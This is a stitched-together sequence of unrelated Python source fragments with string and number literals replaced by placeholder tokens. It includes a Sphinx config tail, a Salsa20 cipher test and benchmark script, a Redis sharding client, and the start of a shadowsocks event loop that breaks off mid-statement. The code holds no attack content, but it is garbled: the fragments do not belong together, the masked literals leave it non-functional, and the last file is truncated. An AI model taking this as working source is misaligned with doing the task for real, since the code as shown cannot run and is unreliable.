    ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' ,
      [ u'<STR_LIT>' ] , <NUM_LIT:1> )
]
texinfo_documents = [
    ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' ,
      u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ,
      '<STR_LIT>' ) ,
]
<s> from __future__ import print_function <EOL> """<STR_LIT>""" <EOL> _version = '<STR_LIT>' <EOL> from struct import Struct <EOL> little16_i32 = Struct ( "<STR_LIT>" ) <EOL> native16_i32 = Struct ( "<STR_LIT>" ) <EOL> from ctypes import c_buffer <EOL> from sys import argv <EOL> import binascii <EOL> def patch_pySalsa20 ( ) : <EOL> """<STR_LIT>""" <EOL> class Testing_pysalsa20 ( pySalsa20 . Salsa20 ) : <EOL> def salsa20core ( self , input , nRounds ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> libSalsa20 . set_rounds ( nRounds ) <EOL> except : <EOL> msg = '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' <EOL> print ( msg ) <EOL> assert type ( input ) == bytes , '<STR_LIT>' <EOL> assert len ( input ) == <NUM_LIT:64> , '<STR_LIT>' <EOL> NUL_message = c_buffer ( <NUM_LIT:64> ) <EOL> output = c_buffer ( <NUM_LIT:64> ) <EOL> ctx = native16_i32 . pack ( * little16_i32 . unpack ( input ) ) <EOL> libSalsa20 . ECRYPT_encrypt_bytes ( ctx , NUL_message , output , <NUM_LIT:64> ) <EOL> return output . raw [ : <NUM_LIT:64> ] <EOL> def force_nRounds ( self , nRounds ) : <EOL> """<STR_LIT>""" <EOL> libSalsa20 . set_rounds ( nRounds ) <EOL> return Testing_pysalsa20 <EOL> def patch_pureSalsa20 ( ) : <EOL> """<STR_LIT>""" <EOL> class Testing_puresalsa20 ( pureSalsa20 . Salsa20 ) : <EOL> def salsa20core ( self , input , nRounds ) : <EOL> assert type ( input ) == bytes , '<STR_LIT>' <EOL> assert len ( input ) == <NUM_LIT:64> , '<STR_LIT>' <EOL> ctx = little16_i32 . unpack ( input ) <EOL> w2b = pureSalsa20 . salsa20_wordtobyte <EOL> return w2b ( ctx , nRounds , checkRounds = False ) <EOL> def force_nRounds ( self , nRounds ) : <EOL> """<STR_LIT>""" <EOL> self . 
setRounds ( nRounds , testing = True ) <EOL> return Testing_puresalsa20 <EOL> def trunc32 ( w ) : <EOL> """<STR_LIT>""" <EOL> w = int ( ( w & <NUM_LIT> ) | ( - ( w & <NUM_LIT> ) ) ) <EOL> assert type ( w ) == int <EOL> return w <EOL> def t32 ( a ) : return tuple ( trunc32 ( x ) for x in a ) <EOL> input_block = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> below_diag = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> below_below = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> continues_down = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> modifies_diag = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> one_round = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> two_rounds = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> twenty_rounds = t32 
( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> output_block = t32 ( [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] ) <EOL> def test_salsa20core ( module , module_name ) : <EOL> print ( "<STR_LIT>" + module_name + "<STR_LIT>" + "<STR_LIT>" ) <EOL> passed = True <EOL> input_block_packed = little16_i32 . pack ( * input_block ) <EOL> assert little16_i32 . unpack ( input_block_packed ) == input_block <EOL> s20 = salsa20_test_classes [ module_name ] ( ) <EOL> x = s20 . salsa20core ( little16_i32 . pack ( * input_block ) , <NUM_LIT:2> ) <EOL> y = t32 ( ti + ii for ( ti , ii ) in zip ( two_rounds , input_block ) ) <EOL> if little16_i32 . unpack ( x ) != y : <EOL> print ( "<STR_LIT>" , end = "<STR_LIT:U+0020>" ) <EOL> print ( "<STR_LIT>" ) <EOL> passed = False <EOL> x = s20 . salsa20core ( little16_i32 . pack ( * input_block ) , <NUM_LIT:20> ) <EOL> if little16_i32 . unpack ( x ) != output_block : <EOL> print ( "<STR_LIT>" , end = "<STR_LIT:U+0020>" ) <EOL> print ( "<STR_LIT>" ) <EOL> passed = False <EOL> if passed : <EOL> print ( "<STR_LIT>" ) <EOL> return passed <EOL> def rot32long ( w , nLeft ) : <EOL> """<STR_LIT>""" <EOL> w &= <NUM_LIT> <EOL> nLeft &= <NUM_LIT> <EOL> w = ( w << nLeft ) | ( w >> ( <NUM_LIT:32> - nLeft ) ) <EOL> return int ( ( w & <NUM_LIT> ) | ( - ( w & <NUM_LIT> ) ) ) <EOL> def test_add32 ( add32 , name ) : <EOL> import random <EOL> print ( "<STR_LIT>" + name + "<STR_LIT>" ) <EOL> passed = True <EOL> groups = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ] <EOL> ng = len ( groups ) <EOL> inputs = [ ] <EOL> for i in range ( <NUM_LIT:2> ** ng ) : <EOL> inputs . 
append ( sum ( [ groups [ p ] for p in range ( ng ) if ( <NUM_LIT:1> << p ) & i ] ) ) <EOL> for i in range ( <NUM_LIT:2> ** ng ) : <EOL> inputs . append ( int ( random . randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) ) <EOL> for a in inputs : <EOL> for b in inputs : <EOL> x = add32 ( a , b ) <EOL> y = trunc32 ( a + b ) <EOL> if x != y : <EOL> print ( name + ( <EOL> "<STR_LIT>" % ( <EOL> a & <NUM_LIT> , b & <NUM_LIT> , x & <NUM_LIT> , <EOL> y & <NUM_LIT> ) <EOL> ) ) <EOL> passed = False <EOL> if type ( x ) != type ( <NUM_LIT:0> ) : <EOL> print ( name + "<STR_LIT>" % ( <EOL> a & <NUM_LIT> , b & <NUM_LIT> , x & <NUM_LIT> , <EOL> ) + type ( x ) ) <EOL> passed = False <EOL> if passed : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return passed <EOL> from time import time <EOL> print ( "<STR_LIT>" ) <EOL> start = time ( ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> a = int ( random . randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) <EOL> for j in range ( <NUM_LIT:100> ) : <EOL> b = int ( random . 
randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) <EOL> for k in range ( <NUM_LIT:10> ) : <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> add32 ( a , b ) <EOL> duration = time ( ) - start <EOL> nCalls = <NUM_LIT:100> * <NUM_LIT:100> * <NUM_LIT:10> * <NUM_LIT:10> <EOL> print ( "<STR_LIT>" , duration / nCalls , "<STR_LIT>" , <EOL> nCalls / duration , "<STR_LIT>" ) <EOL> return passed <EOL> def test_rot32 ( rot32 , name ) : <EOL> import random <EOL> print ( "<STR_LIT>" , name , "<STR_LIT>" ) <EOL> passed = True <EOL> for j in range ( - <NUM_LIT:32> , <NUM_LIT> ) : <EOL> for i in range ( <NUM_LIT:32> ) : <EOL> w = trunc32 ( <NUM_LIT:1> << i ) <EOL> x = rot32 ( w , j ) <EOL> y = trunc32 ( <NUM_LIT:1> << ( ( i + j ) & <NUM_LIT> ) ) <EOL> if x != y : <EOL> print ( name + "<STR_LIT>" % ( <EOL> w & <NUM_LIT> , j , x & <NUM_LIT> , y & <NUM_LIT> ) ) <EOL> passed = False <EOL> if type ( x ) != type ( <NUM_LIT:0> ) : <EOL> print ( name + "<STR_LIT>" % ( <EOL> w & <NUM_LIT> , j , x & <NUM_LIT> ) , type ( x ) ) <EOL> passed = False <EOL> if passed : <EOL> w = int ( random . randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) <EOL> x = rot32 ( w , j ) <EOL> y = rot32 ( x , - j ) <EOL> if y != w : <EOL> print ( name + "<STR_LIT>" % ( <EOL> w & <NUM_LIT> , j , x & <NUM_LIT> ) , end = "<STR_LIT>" ) <EOL> print ( name + "<STR_LIT>" % ( <EOL> x & <NUM_LIT> , - j , y & <NUM_LIT> ) ) <EOL> passed = False <EOL> if passed : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> return passed <EOL> from time import time <EOL> print ( "<STR_LIT>" ) <EOL> start = time ( ) <EOL> for k in range ( <NUM_LIT:100> ) : <EOL> w = int ( random . 
randrange ( - <NUM_LIT:1> << <NUM_LIT> , <NUM_LIT:1> << <NUM_LIT> ) ) <EOL> for i in range ( <NUM_LIT:10> ) : <EOL> for j in range ( - <NUM_LIT> , <NUM_LIT:32> ) : <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> rot32 ( w , j ) <EOL> duration = time ( ) - start <EOL> nCalls = <NUM_LIT:100> * <NUM_LIT:10> * <NUM_LIT> * <NUM_LIT:10> <EOL> print ( "<STR_LIT>" , duration / nCalls , "<STR_LIT>" , end = "<STR_LIT>" ) <EOL> print ( nCalls / duration , "<STR_LIT>" ) <EOL> return passed <EOL> def savetofile ( filename , content ) : <EOL> "<STR_LIT>" <EOL> f = open ( filename , '<STR_LIT:wb>' ) <EOL> f . write ( content ) <EOL> f . close ( ) <EOL> def loadfmfile ( filename ) : <EOL> "<STR_LIT>" <EOL> f = open ( filename , '<STR_LIT:rb>' ) <EOL> content = f . read ( ) <EOL> f . close ( ) <EOL> return content <EOL> def bytestring ( hex ) : <EOL> "<STR_LIT>" <EOL> return binascii . unhexlify ( hex . replace ( '<STR_LIT:U+0020>' , '<STR_LIT>' ) . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) ) <EOL> def test ( module , module_name ) : <EOL> print ( "<STR_LIT>" , module_name , "<STR_LIT:version>" , module . _version , "<STR_LIT>" ) <EOL> from sys import stdout <EOL> passed = True <EOL> if <NUM_LIT:1> : <EOL> if "<STR_LIT>" in module . __dict__ : <EOL> passed &= test_rot32 ( module . rot32 , module_name + "<STR_LIT>" ) <EOL> passed &= test_rot32 ( rot32long , "<STR_LIT>" ) <EOL> print ( ) <EOL> if "<STR_LIT>" in module . __dict__ : <EOL> passed &= test_add32 ( module . 
add32 , module_name + "<STR_LIT>" ) <EOL> if <NUM_LIT:1> and passed : <EOL> test_salsa20core ( module , module_name ) <EOL> if <NUM_LIT:1> and passed : <EOL> rounds = <NUM_LIT:8> <EOL> if <NUM_LIT:0> : <EOL> message = loadfmfile ( '<STR_LIT>' ) <EOL> else : <EOL> message = b'<STR_LIT>' <EOL> key = b'<STR_LIT>' <EOL> nonce = b'<STR_LIT>' <EOL> IV = ( nonce + b'<STR_LIT:*>' * <NUM_LIT:8> ) [ : <NUM_LIT:8> ] <EOL> print ( "<STR_LIT>" ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> ciphertxt = s20 . encryptBytes ( message ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> plaintxt = s20 . encryptBytes ( ciphertxt ) <EOL> if message == plaintxt : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> passed = False <EOL> if <NUM_LIT:1> and passed : <EOL> print ( "<STR_LIT>" ) <EOL> rounds = <NUM_LIT:8> <EOL> message = b'<STR_LIT:\x00>' * <NUM_LIT:64> <EOL> key = binascii . unhexlify ( '<STR_LIT>' ) <EOL> IV = binascii . unhexlify ( '<STR_LIT>' ) <EOL> out64 = bytestring ( """<STR_LIT>""" ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> s20 . setIV ( IV ) <EOL> ciphertxt = s20 . encryptBytes ( message ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> plaintxt = s20 . encryptBytes ( ciphertxt ) <EOL> if ( message == plaintxt and <EOL> ciphertxt [ : <NUM_LIT:64> ] == out64 ) : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> passed = False <EOL> if <NUM_LIT:1> and passed : <EOL> print ( "<STR_LIT>" ) <EOL> rounds = <NUM_LIT:8> <EOL> message = b'<STR_LIT:\x00>' * <NUM_LIT> <EOL> key = binascii . unhexlify ( '<STR_LIT>' ) <EOL> IV = binascii . unhexlify ( '<STR_LIT>' ) <EOL> out64 = bytestring ( """<STR_LIT>""" ) <EOL> out65536 = bytestring ( """<STR_LIT>""" ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> ciphertxt = s20 . 
encryptBytes ( message ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , rounds ) <EOL> plaintxt = s20 . encryptBytes ( ciphertxt ) <EOL> if ( message == plaintxt and <EOL> ciphertxt [ : <NUM_LIT:64> ] == out64 and <EOL> ciphertxt [ <NUM_LIT> : ] == out65536 ) : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> passed = False <EOL> if <NUM_LIT:1> and passed : <EOL> from time import time <EOL> from math import ceil <EOL> print ( "<STR_LIT>" ) <EOL> names = { } <EOL> speeds = { } <EOL> message_lens = [ <NUM_LIT:64> , <NUM_LIT:2> ** <NUM_LIT:16> ] <EOL> namefmt = "<STR_LIT>" <EOL> print ( namefmt % "<STR_LIT:U+0020>" , end = "<STR_LIT:U+0020>" ) <EOL> msg_len_fmt = "<STR_LIT>" <EOL> speed_fmt = "<STR_LIT>" <EOL> for msg_len in message_lens : <EOL> print ( msg_len_fmt % msg_len , end = "<STR_LIT:U+0020>" ) <EOL> print ( ) <EOL> for nRounds in [ <NUM_LIT:8> , <NUM_LIT:20> , <NUM_LIT> ] : <EOL> names [ nRounds ] = "<STR_LIT>" + repr ( nRounds ) + "<STR_LIT::>" <EOL> print ( namefmt % names [ nRounds ] , end = "<STR_LIT:U+0020>" ) <EOL> speeds [ nRounds ] = { } <EOL> if nRounds <= <NUM_LIT:20> : lens = message_lens <EOL> else : lens = message_lens [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> for msg_len in lens : <EOL> message = b'<STR_LIT:\x00>' * msg_len <EOL> key = binascii . unhexlify ( '<STR_LIT>' ) <EOL> IV = binascii . unhexlify ( '<STR_LIT>' ) <EOL> s20 = salsa20_test_classes [ module_name ] ( key , IV , <NUM_LIT:20> ) <EOL> s20 . force_nRounds ( nRounds ) <EOL> nreps = <NUM_LIT:1> <EOL> duration = <NUM_LIT> <EOL> while duration < <NUM_LIT:5> : <EOL> nreps = int ( ceil ( nreps * min ( <NUM_LIT:4> , <NUM_LIT> / duration ) ) ) <EOL> start = time ( ) <EOL> for i in range ( nreps ) : <EOL> ciphertxt = s20 . encryptBytes ( message ) <EOL> duration = time ( ) - start <EOL> speeds [ nRounds ] [ msg_len ] = msg_len * nreps / duration <EOL> print ( speed_fmt % speeds [ nRounds ] [ msg_len ] , end = "<STR_LIT:U+0020>" ) <EOL> stdout . 
flush ( ) <EOL> print ( ) <EOL> return passed <EOL> salsa20_modules = { "<STR_LIT>" : None , "<STR_LIT>" : None } <EOL> salsa20_test_classes = { "<STR_LIT>" : None , "<STR_LIT>" : None } <EOL> def import_salsa ( module_names , verbose = False ) : <EOL> """<STR_LIT>""" <EOL> for name in module_names : <EOL> if name == "<STR_LIT>" : <EOL> try : <EOL> global pureSalsa20 <EOL> import pureSalsa20 <EOL> salsa20_test_classes [ name ] = patch_pureSalsa20 ( ) <EOL> salsa20_modules [ name ] = pureSalsa20 <EOL> except : <EOL> if verbose : print ( "<STR_LIT>" ) <EOL> elif name == "<STR_LIT>" : <EOL> try : <EOL> global pySalsa20 <EOL> import pySalsa20 <EOL> global libSalsa20 <EOL> libSalsa20 = pySalsa20 . loadLib ( '<STR_LIT>' ) <EOL> salsa20_test_classes [ name ] = patch_pySalsa20 ( ) <EOL> salsa20_modules [ name ] = pySalsa20 <EOL> except : <EOL> if verbose : <EOL> print ( "<STR_LIT>" , end = "<STR_LIT:U+0020>" ) <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> if verbose : <EOL> print ( "<STR_LIT>" , repr ( n ) , "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> passed = True <EOL> if len ( argv ) > <NUM_LIT:1> : <EOL> asked = argv [ <NUM_LIT:1> : ] <EOL> else : <EOL> asked = [ name for name in salsa20_modules ] <EOL> import_salsa ( asked ) <EOL> for name in asked : <EOL> module = salsa20_modules [ name ] <EOL> if module : <EOL> passed &= test ( module , name ) <EOL> elif len ( argv ) > <NUM_LIT:1> : <EOL> passed = False <EOL> import_salsa ( asked , verbose = True ) <EOL> if not passed : <EOL> from sys import exit <EOL> exit ( <NUM_LIT:1> ) </s>
import re
import functools
import redis
from multiprocessing . dummy import Pool as ThreadPool
from redis . client import Lock
from redis . sentinel import Sentinel
from . commands import SHARD_METHODS
from . _compat import basestring , iteritems
from . hashring import HashRing
from . helpers import format_servers
from . pipeline import Pipeline
from . sentinel import SentinelRedis

# Pattern that extracts a "hash tag" from a key so that related keys can be
# forced onto the same shard (pattern text masked in this corpus).
_findhash = re . compile ( '<STR_LIT>' , re . I )


def list_or_args ( keys , args ) :
    """Normalize (keys, *args) into a flat list of keys."""
    try :
        iter ( keys )
        # A bare string is a single key, not an iterable of keys.
        if isinstance ( keys , basestring ) :
            keys = [ keys ]
    except TypeError :
        keys = [ keys ]
    if args :
        keys . extend ( args )
    return keys


class RedisShardAPI ( object ) :
    """Redis client that routes each command to a shard via consistent hashing."""

    def __init__ ( self , servers , hash_method = '<STR_LIT>' , sentinel = None , strict_redis = False ) :
        self . nodes = [ ]
        self . connections = { }
        self . pool = None
        servers = format_servers ( servers )
        if sentinel :
            sentinel = Sentinel ( sentinel [ '<STR_LIT>' ] , socket_timeout = sentinel . get ( '<STR_LIT>' , <NUM_LIT:1> ) )
        for server_config in servers :
            name = server_config . pop ( '<STR_LIT:name>' )
            server_config [ "<STR_LIT>" ] = int ( server_config . get ( "<STR_LIT>" , <NUM_LIT:100> ) )
            # Node names must be unique; they are the hash-ring identities.
            if name in self . connections :
                raise ValueError ( "<STR_LIT>" )
            if sentinel :
                self . connections [ name ] = SentinelRedis ( sentinel , name )
            elif strict_redis :
                self . connections [ name ] = redis . StrictRedis ( ** server_config )
            else :
                self . connections [ name ] = redis . Redis ( ** server_config )
            server_config [ '<STR_LIT:name>' ] = name
            self . nodes . append ( name )
        self . ring = HashRing ( self . nodes , hash_method = hash_method )

    def get_server_name ( self , key ) :
        """Return the shard name for *key* (hash tag wins over the full key)."""
        g = _findhash . match ( key )
        if g is not None and len ( g . groups ( ) ) > <NUM_LIT:0> :
            key = g . groups ( ) [ <NUM_LIT:0> ]
        name = self . ring . get_node ( key )
        return name

    def get_server ( self , key ) :
        """Return the connection object for the shard that owns *key*."""
        name = self . get_server_name ( key )
        return self . connections [ name ]

    def _build_pool ( self ) :
        # Lazily create one worker thread per shard for fan-out operations.
        if self . pool is None :
            self . pool = ThreadPool ( len ( self . nodes ) )

    def __wrap ( self , method , * args , ** kwargs ) :
        """Dispatch a single-key command to the shard owning args[0]."""
        try :
            key = args [ <NUM_LIT:0> ]
            assert isinstance ( key , basestring )
        except :
            raise ValueError ( "<STR_LIT>" % method )
        server = self . get_server ( key )
        f = getattr ( server , method )
        return f ( * args , ** kwargs )

    def __wrap_eval ( self , method , script_or_sha , numkeys , * keys_and_args ) :
        """Dispatch EVAL/EVALSHA; only single-key scripts can be routed."""
        if numkeys != <NUM_LIT:1> :
            raise NotImplementedError ( "<STR_LIT>" )
        key = keys_and_args [ <NUM_LIT:0> ]
        server = self . get_server ( key )
        f = getattr ( server , method )
        return f ( script_or_sha , numkeys , * keys_and_args )

    def __wrap_tag ( self , method , * args , ** kwargs ) :
        """Dispatch a tag-prefixed command; the key(s) must carry a hash tag."""
        key = args [ <NUM_LIT:0> ]
        if isinstance ( key , basestring ) and '<STR_LIT:{>' in key :
            server = self . get_server ( key )
        elif isinstance ( key , list ) and '<STR_LIT:{>' in key [ <NUM_LIT:0> ] :
            server = self . get_server ( key [ <NUM_LIT:0> ] )
        else :
            raise ValueError ( "<STR_LIT>" % method )
        # NOTE(review): lstrip() strips a *character set*, not a prefix —
        # presumably intended to remove the tag-method prefix; if any real
        # command name starts with one of those characters this would
        # over-strip. Confirm against the masked literal.
        method = method . lstrip ( "<STR_LIT>" )
        f = getattr ( server , method )
        return f ( * args , ** kwargs )

    def __getattr__ ( self , method ) :
        # Route unknown attributes: shardable commands, eval commands, or
        # tag-prefixed commands; everything else is unsupported.
        if method in SHARD_METHODS :
            return functools . partial ( self . __wrap , method )
        elif method in ( '<STR_LIT>' , '<STR_LIT>' ) :
            return functools . partial ( self . __wrap_eval , method )
        elif method . startswith ( "<STR_LIT>" ) :
            return functools . partial ( self . __wrap_tag , method )
        else :
            raise NotImplementedError ( "<STR_LIT>" % method )

    def brpop ( self , key , timeout = <NUM_LIT:0> ) :
        """Blocking right-pop; multi-key form cannot be sharded."""
        if not isinstance ( key , basestring ) :
            raise NotImplementedError ( "<STR_LIT>" )
        server = self . get_server ( key )
        return server . brpop ( key , timeout )

    def blpop ( self , key , timeout = <NUM_LIT:0> ) :
        """Blocking left-pop; multi-key form cannot be sharded."""
        if not isinstance ( key , basestring ) :
            raise NotImplementedError ( "<STR_LIT>" )
        server = self . get_server ( key )
        return server . blpop ( key , timeout )

    def keys ( self , key ) :
        """Run KEYS on every shard and concatenate the results."""
        _keys = [ ]
        for node in self . nodes :
            server = self . connections [ node ]
            _keys . extend ( server . keys ( key ) )
        return _keys

    def mget ( self , keys , * args ) :
        """<STR_LIT>"""
        # Group keys by shard, fetch per shard, then restore request order.
        args = list_or_args ( keys , args )
        server_keys = { }
        ret_dict = { }
        for key in args :
            server_name = self . get_server_name ( key )
            server_keys [ server_name ] = server_keys . get ( server_name , [ ] )
            server_keys [ server_name ] . append ( key )
        for server_name , sub_keys in iteritems ( server_keys ) :
            values = self . connections [ server_name ] . mget ( sub_keys )
            ret_dict . update ( dict ( zip ( sub_keys , values ) ) )
        result = [ ]
        for key in args :
            result . append ( ret_dict . get ( key , None ) )
        return result

    def mset ( self , mapping ) :
        """<STR_LIT>"""
        # Partition the mapping by owning shard and issue one MSET each.
        servers = { }
        for key , value in mapping . items ( ) :
            server_name = self . get_server_name ( key )
            servers . setdefault ( server_name , [ ] )
            servers [ server_name ] . append ( ( key , value ) )
        for name , items in servers . items ( ) :
            self . connections [ name ] . mset ( dict ( items ) )
        return True

    def flushdb ( self ) :
        """Flush every shard's current database."""
        for node in self . nodes :
            server = self . connections [ node ]
            server . flushdb ( )

    def lock ( self , name , timeout = None , sleep = <NUM_LIT:0.1> ) :
        """<STR_LIT>"""
        return Lock ( self , name , timeout = timeout , sleep = sleep )

    def pipeline ( self ) :
        # Sharded pipeline wrapper defined in .pipeline.
        return Pipeline ( self )

    def script_load ( self , script ) :
        """Load a script on every shard; all shards must agree on the SHA."""
        shas = [ ]
        for node in self . nodes :
            server = self . connections [ node ]
            shas . append ( server . script_load ( script ) )
        if not all ( x == shas [ <NUM_LIT:0> ] for x in shas ) :
            raise ValueError ( '<STR_LIT>' )
        return shas [ <NUM_LIT:0> ]

    def haskey ( self , key ) :
        """Membership test delegated to the owning shard."""
        server_name = self . get_server_name ( key )
        return key in self . connections [ server_name ]

    def __delitem__ ( self , key ) :
        server_name = self . get_server_name ( key )
        del self . connections [ server_name ] [ key ]
<s> from __future__ import absolute_import , division , print_function , with_statement <EOL> import os <EOL> import time <EOL> import socket <EOL> import select <EOL> import errno <EOL> import logging <EOL> from collections import defaultdict <EOL> from shadowsocks import shell <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> POLL_NULL = <NUM_LIT> <EOL> POLL_IN = <NUM_LIT> <EOL> POLL_OUT = <NUM_LIT> <EOL> POLL_ERR = <NUM_LIT> <EOL> POLL_HUP = <NUM_LIT> <EOL> POLL_NVAL = <NUM_LIT> <EOL> EVENT_NAMES = { <EOL> POLL_NULL : '<STR_LIT>' , <EOL> POLL_IN : '<STR_LIT>' , <EOL> POLL_OUT : '<STR_LIT>' , <EOL> POLL_ERR : '<STR_LIT>' , <EOL> POLL_HUP : '<STR_LIT>' , <EOL> POLL_NVAL : '<STR_LIT>' , <EOL> } <EOL> TIMEOUT_PRECISION = <NUM_LIT:10> <EOL> class KqueueLoop ( object ) : <EOL> MAX_EVENTS = <NUM_LIT> <EOL> def __init__ ( self ) : <EOL> self . _kqueue = select . kqueue ( ) <EOL> self . _fds = { } <EOL> def _control ( self , fd , mode , flags ) : <EOL> events = [ ] <EOL> if mode & POLL_IN : <EOL> events . append ( select . kevent ( fd , select . KQ_FILTER_READ , flags ) ) <EOL> if mode & POLL_OUT : <EOL> events . append ( select . kevent ( fd , select . KQ_FILTER_WRITE , flags ) ) <EOL> for e in events : <EOL> self . _kqueue . control ( [ e ] , <NUM_LIT:0> ) <EOL> def poll ( self , timeout ) : <EOL> if timeout < <NUM_LIT:0> : <EOL> timeout = None <EOL> events = self . _kqueue . control ( None , KqueueLoop . MAX_EVENTS , timeout ) <EOL> results = defaultdict ( lambda : POLL_NULL ) <EOL> for e in events : <EOL> fd = e . ident <EOL> if e . filter == select . KQ_FILTER_READ : <EOL> results [ fd ] |= POLL_IN <EOL> elif e . filter == select . KQ_FILTER_WRITE : <EOL> results [ fd ] |= POLL_OUT <EOL> return results . items ( ) <EOL> def register ( self , fd , mode ) : <EOL> self . _fds [ fd ] = mode <EOL> self . _control ( fd , mode , select . 
